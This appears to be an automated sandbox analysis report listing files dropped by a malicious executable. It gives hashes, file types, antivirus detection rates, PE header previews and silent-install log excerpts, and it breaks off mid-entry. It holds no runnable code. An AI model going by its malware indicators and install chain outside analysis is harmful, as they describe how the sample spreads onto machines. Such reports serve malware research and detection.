                                                                                                                                                                                                                                SHA1:76C3D28B4101620D0FABA3FEED6969A134CE11A9
                                                                                                                                                                                                                                SHA-256:23EA9FDE348B1DC8DA3AFD74692376AAD62C75DA7326F480363C428D769D7817
                                                                                                                                                                                                                                SHA-512:B3D6729718197798DB84D938E15C2CE626609D2D2954E2FD7C5F715BE2996B58CFAC015B379FF58A7A40C6C1097399D7B28D8A86E0747B3D054616A59280D639
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:midfilew/6.u....
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1107968
                                                                                                                                                                                                                                Entropy (8bit):7.998152820755428
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:24576:zmWAbXH84DRnKCwyElWCAMmKix1x1IDStOX2cBZ8umx7QgbcxWsG2:zmXL8uokzK6DxcD8uqzbcxWX
                                                                                                                                                                                                                                MD5:78C42D6817AF1AD96CABDF6FF2F7F3DA
                                                                                                                                                                                                                                SHA1:ABEADCEE8D9F00C6CCDB0F9D33EDD1006A079384
                                                                                                                                                                                                                                SHA-256:38B2C7A1AF454D382927F81543D86055886BC028634575050367D052EFD26434
                                                                                                                                                                                                                                SHA-512:76A3B3E6AE0EA0F17661314FE391EC8B9B580A7ECFEE0EBE2D830DB3843D5D929D6BF3ADB8CB03F6B87212A607CE001700EA3DC305828C817FF017DD3B766811
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-/..C|..C|..C|...|..C|...|..C|...|..C|...|..C|...|..C|...|..C|...|..C|..B|.C|..|..C|..|..C|...|..C|..|..C|Rich..C|................PE..L....o"c..............................)...........@...........................)...........@...................................)......P'.......................).........8............................................................................text...............................`....rdata... ..........................@....data....P....&..*..................@....rsrc........P'.....................@....reloc...P...`'.....................@....ask..... ....).....................`....adata........).....................@...................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):17075
                                                                                                                                                                                                                                Entropy (8bit):5.103358868844468
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:0hkCbkRYveJZqrXfiqOi4ct69xW9lvduTJCDzRyps7ojjR+zE:0pbkCvePqrXfiq/i4vuIojjR+w
                                                                                                                                                                                                                                MD5:47BE6FD0B71BEF4F94F3BB18881249E0
                                                                                                                                                                                                                                SHA1:4F505EA8A6A14E84CB8A96D6A825E44D70359FB5
                                                                                                                                                                                                                                SHA-256:2180D86C6189F84273CF05F1FB16A06963870567080058B2BCDBE9EC645F2BF5
                                                                                                                                                                                                                                SHA-512:A050D11AE766979C3D87C3D0A0FA4F148BA12114AABC0569525C0AB14549DAB0BDAB177160D17AD693D00143E639486E8F08051BB70BB05CEB01BAFA618A553B
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:.2022-10-04 07:10:14.833 Log opened. (Time zone: UTC+01:00)..2022-10-04 07:10:14.833 Setup version: Inno Setup version 6.2.0..2022-10-04 07:10:14.833 Original Setup EXE: C:\Users\user\AppData\Local\Temp\qymasQHsquYhjAFGoa\FagLhQ..2022-10-04 07:10:14.833 Setup command line: /SL5="$5040E,11860388,791040,C:\Users\user\AppData\Local\Temp\qymasQHsquYhjAFGoa\FagLhQ" -/SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=767..2022-10-04 07:10:14.833 Windows version: 10.0.19042 (NT platform: Yes)..2022-10-04 07:10:14.833 64-bit Windows: Yes..2022-10-04 07:10:14.833 Processor architecture: x64..2022-10-04 07:10:14.833 User privileges: Administrative..2022-10-04 07:10:14.989 Administrative install mode: Yes..2022-10-04 07:10:14.989 Install mode root key: HKEY_LOCAL_MACHINE..2022-10-04 07:10:14.989 64-bit install mode: Yes..2022-10-04 07:10:15.036 Created temporary directory: C:\Users\user\AppData\Local\Temp\is-A3Q0E.tmp..2022-10-04 07:10:15.083 -- DLL function import --..202
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif
                                                                                                                                                                                                                                File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                Entropy (8bit):3.375
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:xs:2
                                                                                                                                                                                                                                MD5:F2483E4908631C60551AD1A49E6E33AF
                                                                                                                                                                                                                                SHA1:76C3D28B4101620D0FABA3FEED6969A134CE11A9
                                                                                                                                                                                                                                SHA-256:23EA9FDE348B1DC8DA3AFD74692376AAD62C75DA7326F480363C428D769D7817
                                                                                                                                                                                                                                SHA-512:B3D6729718197798DB84D938E15C2CE626609D2D2954E2FD7C5F715BE2996B58CFAC015B379FF58A7A40C6C1097399D7B28D8A86E0747B3D054616A59280D639
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:midfilew/6.u....
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif
                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):520704
                                                                                                                                                                                                                                Entropy (8bit):2.4908605030636943
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:gSvNWMz7EVXU/hVJ+7hSYfGJsQO849wk9ESnGCuqqyUq60atL+Qs1ysiRgiSlmmU:hI47GyTGCwiSnmQUt0LB1ysKs5gT
                                                                                                                                                                                                                                MD5:362A6081EAFE20BBCBA11658A6968CF6
                                                                                                                                                                                                                                SHA1:9020D7F836F1C78D49DEDC862F9F9D1131A5AC99
                                                                                                                                                                                                                                SHA-256:52081FA70A610D9888FB00BED23A6A1F7124C103476CC5258A6932C5CF377AA2
                                                                                                                                                                                                                                SHA-512:0740FC62E8443D9D7E38D2E9B91B696E5B4DAF92C8B9D43079AA91DCE097948FA7C87726EEFD2E20B5C2FDA83B446D251ED4B47BE10D04C674AB038FA6AA2A59
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 46%
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......le.Z(...(...(...Mb..)...Mb..*...Mb..:...Mb..9...(.......Mb..!...Mbh.)...Mb..)...Rich(...........................PE..d................."......t...z.......y.........@.............................P......H.....`.......... ...................................................J...................@.. .......T............................................... ............................text...0s.......t.................. ..`.rdata...".......$...x..............@..@.data...............................@....pdata..............................@..@.rsrc....J.......L..................@..@.reloc.. ....@......................@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif
                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):3632640
                                                                                                                                                                                                                                Entropy (8bit):7.798909542768245
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:uD8Q1YEC3D2jvmA86mGdWE3h8OMNzE69URP+:C8Q1bCajuA869ufDAP+
                                                                                                                                                                                                                                MD5:2F8CBF74871165688C040E0C95DCE0F0
                                                                                                                                                                                                                                SHA1:FB1AE30EAF62B936FFAF3DB8B72139BD3E265965
                                                                                                                                                                                                                                SHA-256:BE3D6E0C3F530725FB7E4F0572CB17B5F87949EA6F8F3110DD3A23025BD06A03
                                                                                                                                                                                                                                SHA-512:03062213163D13B02C299437B8893D2B69B7EF6158DCCE8313EBE32A9590EE66811B8F727ECBDFAC378204F5E6CD8FFF83CB1A524B8F501D13BE5E842E3F4B5E
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 46%
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....F8c..........#.................(.,........@..............................`........... .................................................X.).............@.`.l...........................................H.;.0.....`.0.............K..............................text............................... ..`.rdata..............................@..@.data..............................@....pdata..d....0......................@..@_RDATA..............................@..@.vmp0....H..........................`..`.vmp1....i7.. )..j7.................`..h........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\zamzGuUAZjRRZhjPeC\MpVMRr
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):571230
                                                                                                                                                                                                                                Entropy (8bit):7.964583089817611
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:FV1e0UgkVT6ZT+3JCnoxgLsoCXwbePLJrH8fwpj:FV1edgkV8T0Cnox14ePLJTMwpj
                                                                                                                                                                                                                                MD5:558FB165F9DEC4A658095E16878896E2
                                                                                                                                                                                                                                SHA1:B0813050BB1B447DBE4544696C73D7419971ACF2
                                                                                                                                                                                                                                SHA-256:F0C6A3D1543BFBCB7BE733CF2A03A5864FCF7EA9B23897E5C0B4E84CCB78E1E4
                                                                                                                                                                                                                                SHA-512:94D5A996AF420078028E4FC4AFB463DB28D622AC2C0785FA73690D5FDF022CD5F2DDD4712BC45071E9C3DA1DAB0394A192066338C3BA76F51F3D12E94B37FA18
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:P,..Hh.j...?...O}3..8v,)cml.T/.....V.r.....n.?y..oz#V......N.{.....!....Y."..)v.T.........Ub.V..*.)..8..,.%.{4.yWrA.a36&..,...V...l9.y....39.y...wW.j.ox.....I..;..%..p.b..>..j.....j..awT..r...j....o./.7...,=uk..i../h..j*j.P.j..?.-X.k..R}.j.5.b-F.k..c........j...j..Q?...).qe......,o'k.....j.J..))O.......k..\.....u,..k...,..k....k...tOT.X.jXe-.k..7.k...83U.......%..o.....Y%.....7.F.(j...KP..I..j..y...o..no......z......u/..DJP.e+.Dj..Z....k.......j$T.X.j[..`....o....k{..2|6...H.....c%..........z......~^..j.-s.....o.-........6.L.`.j.-s.....i|..y.Q'....k...}FT.X.jY..Y....o......y..=|6..%..z/........s....>.j.-s.k../.:..........>|/...h...2/..R..-......k....9.y.....j.6Z.j.o....l&..%.UD..`....&..t>".6g..j,..../W=..5...n.......X..h>.k..'...|/h..jfDX.S...`&*...Y....)U]bc[......'(..l..+....b.i....[...If!S...r......i.....Q^..*.....aeddT.`.'....*.[.h....e...?>....n....5......-..j..T..ow......k....-...k16.+i(~..L....j,...c.L./w=j...~./
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\zamzGuUAZjRRZhjPeC\MpVMRr
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):53248
                                                                                                                                                                                                                                Entropy (8bit):5.670422203199715
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:ZSD7R43xFiSK6u2oYf45rVGAYvZZ0UtVtnR:8DaTxGrVGxvhtR
                                                                                                                                                                                                                                MD5:E2082E7D7EEB4A3D599472A33CBACA24
                                                                                                                                                                                                                                SHA1:ADD8CF241E8FA6EC1E18317A7F3972E900DD9AB7
                                                                                                                                                                                                                                SHA-256:9E02E104E1AB52A1C33D650C34D05A641C53E8EDD5471C7EE4F68F29C79D62C1
                                                                                                                                                                                                                                SHA-512:AE880716E0A2DB43797A55294E101AD92323A0F08443C0337C4ABE4D049375821B04B08744889C992B2A01396E89702585E9A3688E6C795E208E3DD594A99E07
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                                                                                                                                • Antivirus: Metadefender, Detection: 11%, Browse
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)a..H..H..H..r.H..a.H..b..H..oGR.H..H...H..}.H..u.H..w.H..Rich.H..........PE..L.....0c...........!.....p...P.......................................................W..................................`.......(................................................................... ...@............................................text....g.......p.................. ..`.rdata........... ..................@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):17228
                                                                                                                                                                                                                                Entropy (8bit):5.512864476593842
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:hZsbGnY1I1W1F1B1m10171X2Qp810XI+ljNjCHQT8dpm42ZF0xgd:bsKE2Qp81elhGqI2ZFAgd
                                                                                                                                                                                                                                MD5:7F7F643F7239A674414E67DB6A68265E
                                                                                                                                                                                                                                SHA1:05AD588F7C668329BDE8D2BC86675C49A91B6DD4
                                                                                                                                                                                                                                SHA-256:8BA630BF124A36E8855F31D7334C546440B4FC51B39CDB7C73AC7F81C47F3B7B
                                                                                                                                                                                                                                SHA-512:50E96D6280C43BB737547585366B1320569C05266DB759BFE303412D8D09D87BC491D01BC4007BF55F5496579D49137AA6479BA5CC4809C88FA97523C66A64CF
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:[1FB8:13E4][2022-10-04T07:10:21]i001: Burn v3.10.4.4718, Windows v10.0 (Build 19042: Service Pack 0), path: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe..[1FB8:13E4][2022-10-04T07:10:21]i009: Command Line: '-burn.clean.room=C:\Users\user\AppData\Local\Temp\is-A3Q0E.tmp\vc_redist.x64.exe -burn.filehandle.attached=636 -burn.filehandle.self=644 /install /quiet /norestart'..[1FB8:13E4][2022-10-04T07:10:21]i000: Setting string variable 'WixBundleOriginalSource' to value 'C:\Users\user\AppData\Local\Temp\is-A3Q0E.tmp\vc_redist.x64.exe'..[1FB8:13E4][2022-10-04T07:10:21]i000: Setting string variable 'WixBundleOriginalSourceFolder' to value 'C:\Users\user\AppData\Local\Temp\is-A3Q0E.tmp\'..[1FB8:13E4][2022-10-04T07:10:24]i000: Setting string variable 'WixBundleLog' to value 'C:\Users\user\AppData\Local\Temp\dd_vcredist_amd64_20221004071024.log'..[1FB8:13E4][2022-10-04T07:10:24]i000: Setting string variable 'WixBundleName' to value 'Microsoft Visual C++ 20
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.be\VC_redist.x64.exe
                                                                                                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):143170
                                                                                                                                                                                                                                Entropy (8bit):3.8305559472077797
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:G3KanaDL5nAKuF0+BzfYHcXpUpfPcumG4Qu+Xe+UDPjf0W8888888888oBaFVp5E:G4Sjfp8888888888oBaFVp5+TOfREvl
                                                                                                                                                                                                                                MD5:D1D9CA55B19F55B97B2089B8CA4DA101
                                                                                                                                                                                                                                SHA1:8E8A85C7C7BBBBD99CACF6E6D4CE01FD2F11EDE6
                                                                                                                                                                                                                                SHA-256:F64FAFB5036F86CDD1EB440E9353DD1221EBAF24912C64003C4A6C49EFA4AB1C
                                                                                                                                                                                                                                SHA-512:EA4C3CE2CD79E2E11C41D1E824A4F796716F7D9BE6B610DC0FEC8403A5B0DB74AC96D52EDD997114042B6E8BD65B5AA20B99DE500166BA186A7D2E7C485ED2E3
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:..=.=.=. .V.e.r.b.o.s.e. .l.o.g.g.i.n.g. .s.t.a.r.t.e.d.:. .0.4./.1.0./.2.0.2.2. . .0.7.:.1.0.:.5.8. . .B.u.i.l.d. .t.y.p.e.:. .S.H.I.P. .U.N.I.C.O.D.E. .5...0.0...1.0.0.1.1...0.0. . .C.a.l.l.i.n.g. .p.r.o.c.e.s.s.:. .C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.{.0.7.D.0.B.8.3.2.-.8.F.4.0.-.4.A.0.9.-.8.1.B.7.-.C.9.2.B.2.4.8.8.5.2.D.A.}.\...b.e.\.V.C._.r.e.d.i.s.t...x.6.4...e.x.e. .=.=.=.....M.S.I. .(.c.). .(.A.4.:.2.C.). .[.0.7.:.1.0.:.5.8.:.9.9.6.].:. .R.e.s.e.t.t.i.n.g. .c.a.c.h.e.d. .p.o.l.i.c.y. .v.a.l.u.e.s.....M.S.I. .(.c.). .(.A.4.:.2.C.). .[.0.7.:.1.0.:.5.8.:.9.9.6.].:. .M.a.c.h.i.n.e. .p.o.l.i.c.y. .v.a.l.u.e. .'.D.e.b.u.g.'. .i.s. .0.....M.S.I. .(.c.). .(.A.4.:.2.C.). .[.0.7.:.1.0.:.5.8.:.9.9.6.].:. .*.*.*.*.*.*.*. .R.u.n.E.n.g.i.n.e.:..... . . . . . . . . . . .*.*.*.*.*.*.*. .P.r.o.d.u.c.t.:. .C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.P.a.c.k.a.g.e. .C.a.c.h.e.\.{.3.4.0.7.B.9.0.0.-.3.7.F.5.-.4.C.C.2.-.B.6.1.2.-.5.C.D.5.D.5.8.0.A.1.6.3.}.v.1.4...3.2...3.1.3.3.2.\.p.a.c.k.a.g.e.s.\.v.c.R.u.n.t.i.m.e.
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.be\VC_redist.x64.exe
                                                                                                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):134098
                                                                                                                                                                                                                                Entropy (8bit):3.8225785726192707
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:d7rjzk/FFFFFFFFFFF33kHQNb5FHshQ7wzgS8/:tjE
                                                                                                                                                                                                                                MD5:0F6EF8F85161FA3C44FE7FD5E24B18DA
                                                                                                                                                                                                                                SHA1:5A830DFFCB97E4A0CF747CB6B41DBEACB809C5F6
                                                                                                                                                                                                                                SHA-256:6244CEB004C40C44E3C07ECA920AC616CA25EA50CBB6820BE4CDE0A58F927107
                                                                                                                                                                                                                                SHA-512:6D45D831444BFA5BB1F9CF35EE8AD7406BFF071AF559D35AD62A3907BCA39588A15AD1D53BD179B6ADE523D91093B433456A9BD734620BA954F8729EA08F79B0
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:..=.=.=. .V.e.r.b.o.s.e. .l.o.g.g.i.n.g. .s.t.a.r.t.e.d.:. .0.4./.1.0./.2.0.2.2. . .0.7.:.1.0.:.5.9. . .B.u.i.l.d. .t.y.p.e.:. .S.H.I.P. .U.N.I.C.O.D.E. .5...0.0...1.0.0.1.1...0.0. . .C.a.l.l.i.n.g. .p.r.o.c.e.s.s.:. .C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.{.0.7.D.0.B.8.3.2.-.8.F.4.0.-.4.A.0.9.-.8.1.B.7.-.C.9.2.B.2.4.8.8.5.2.D.A.}.\...b.e.\.V.C._.r.e.d.i.s.t...x.6.4...e.x.e. .=.=.=.....M.S.I. .(.c.). .(.A.4.:.B.8.). .[.0.7.:.1.0.:.5.9.:.9.3.3.].:. .R.e.s.e.t.t.i.n.g. .c.a.c.h.e.d. .p.o.l.i.c.y. .v.a.l.u.e.s.....M.S.I. .(.c.). .(.A.4.:.B.8.). .[.0.7.:.1.0.:.5.9.:.9.3.3.].:. .M.a.c.h.i.n.e. .p.o.l.i.c.y. .v.a.l.u.e. .'.D.e.b.u.g.'. .i.s. .0.....M.S.I. .(.c.). .(.A.4.:.B.8.). .[.0.7.:.1.0.:.5.9.:.9.3.3.].:. .*.*.*.*.*.*.*. .R.u.n.E.n.g.i.n.e.:..... . . . . . . . . . . .*.*.*.*.*.*.*. .P.r.o.d.u.c.t.:. .C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.P.a.c.k.a.g.e. .C.a.c.h.e.\.{.F.4.4.9.9.E.E.3.-.A.1.6.6.-.4.9.6.C.-.8.1.B.B.-.5.1.D.1.B.C.D.C.7.0.A.9.}.v.1.4...3.2...3.1.3.3.2.\.p.a.c.k.a.g.e.s.\.v.c.R.u.n.t.i.m.e.
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\qymasQHsquYhjAFGoa\FagLhQ
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):3134848
                                                                                                                                                                                                                                Entropy (8bit):6.373276623362357
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:UEA9P+bz2cHPcUb6HSb4SOEMkBeH7nQckO6bAGx7jXTVc3338r:E92bz2Eb6pd7B6bAGx7u333s
                                                                                                                                                                                                                                MD5:64F68F0B5364A0313EF5C2EDE5FEAC47
                                                                                                                                                                                                                                SHA1:00AD3DAB6E7906BA79BA23EE43809430ED7901B4
                                                                                                                                                                                                                                SHA-256:25C367DA28A2E61834BBAEED1A594A0CA1E377A8C27215C9AD6AC5D97F671B8B
                                                                                                                                                                                                                                SHA-512:75586A619F9DC618652D62849C7DE840FAF83378ADBB78572A342807B2749628FD0BAAEA79E16124CAC5F82AA49BC9F77274AF039CD7D52885CC655235658DE1
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                                                                                                                Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...(..`.................:,..h......`F,......P,...@...........................0.....i.0...@......@....................-......p-.29....-............../../....................................-......................y-.......-......................text.....,.......,................. ..`.itext...(... ,..*....,............. ..`.data........P,......>,.............@....bss.....y....,..........................idata..29...p-..:....,.............@....didata.......-.......-.............@....edata........-.......-.............@..@.tls....L.....-..........................rdata..].....-.......-.............@..@.rsrc........-.......-.............@..@..............1.......0.............@..@........................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):191384
                                                                                                                                                                                                                                Entropy (8bit):6.606319812980724
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:GHYbm1i+GQ/kUopeW6ZuWUBQJwREy1mN1DX7JxAg0FujtI4U42B/mPnX:uDvkUppZu/8oZ1+AO32YPX
                                                                                                                                                                                                                                MD5:A4CF124B21795DFD382C12422FD901CA
                                                                                                                                                                                                                                SHA1:7E2832F3B8B8E06AE594558D81416E96A81D3898
                                                                                                                                                                                                                                SHA-256:9E371A745EA2C92C4BA996772557F4A66545ED5186D02BB2E73E20DC79906EC7
                                                                                                                                                                                                                                SHA-512:3EE82D438E4A01D543791A6A17D78E148A68796E5F57D7354DA36DA0755369091089466E57EE9B786E7E0305A4321C281E03AEB24F6EB4DD07E7408EB3763CDD
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                                • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d.I. .'. .'. .'.4.$.-.'.4."...'.4.#.6.'.r.#./.'.r.$.4.'.r.".a.'.4.&.#.'. .&.x.'.x.".!.'.x.'.!.'.x..!.'. ...!.'.x.%.!.'.Rich .'.........PE..L...k..b...........!.................c...............................................b....@.............................h...x...(.......H................%...........x...............................x..@...............0............................text...2........................... ..`.rdata..L...........................@..@.data...............................@....rsrc...H...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):6144
                                                                                                                                                                                                                                Entropy (8bit):4.720366600008286
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                                                                                                MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                                                                                                SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                                                                                                SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                                                                                                SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):25234792
                                                                                                                                                                                                                                Entropy (8bit):7.99687049119543
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:393216:JBCFpXQn0ZIoLTNOqMJgrBrIIvsHCwmMziQUv4qXvscamEZF/N4fsdx/78YHVkEv:JWpXDWoLTNOqMJcdyDz81Xv//MYkl
                                                                                                                                                                                                                                MD5:CDCE5D5EE259D8071FA82F522C5C7D6E
                                                                                                                                                                                                                                SHA1:D4F9181E70E3F1AA6C8EDFFCC15B3C3D4BABE36B
                                                                                                                                                                                                                                SHA-256:CE6593A1520591E7DEA2B93FD03116E3FC3B3821A0525322B0A430FAA6B3C0B4
                                                                                                                                                                                                                                SHA-512:8F86693BF9FB4EE0BA021B826663028158D580A0424417A30D8F95EF8853FCD224B5A213BEBA5D99B48BE0607A0A6870158BF1899FE1445DA9CA19A208608527
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'.u.'.u.'.u.......u.....[.u.....?.u...v.4.u...q.4.u...p...u.....".u....6.u.'.t.v.u...p.l.u....&.u.'..%.u...w.&.u.Rich'.u.........................PE..L......Z.....................v......m.............@..........................p.......j....@..............................................;..........P...(...0...=.. t..T...................tt......@n..@...................$........................text.............................. ..`.rdata..............................@..@.data...@...........................@....wixburn8...........................@..@.tls................................@....gfids..............................@..@.rsrc....;.......<..................@..@.reloc...=...0...>..................@..B........................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):25234792
                                                                                                                                                                                                                                Entropy (8bit):7.99687049119543
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:393216:JBCFpXQn0ZIoLTNOqMJgrBrIIvsHCwmMziQUv4qXvscamEZF/N4fsdx/78YHVkEv:JWpXDWoLTNOqMJcdyDz81Xv//MYkl
                                                                                                                                                                                                                                MD5:CDCE5D5EE259D8071FA82F522C5C7D6E
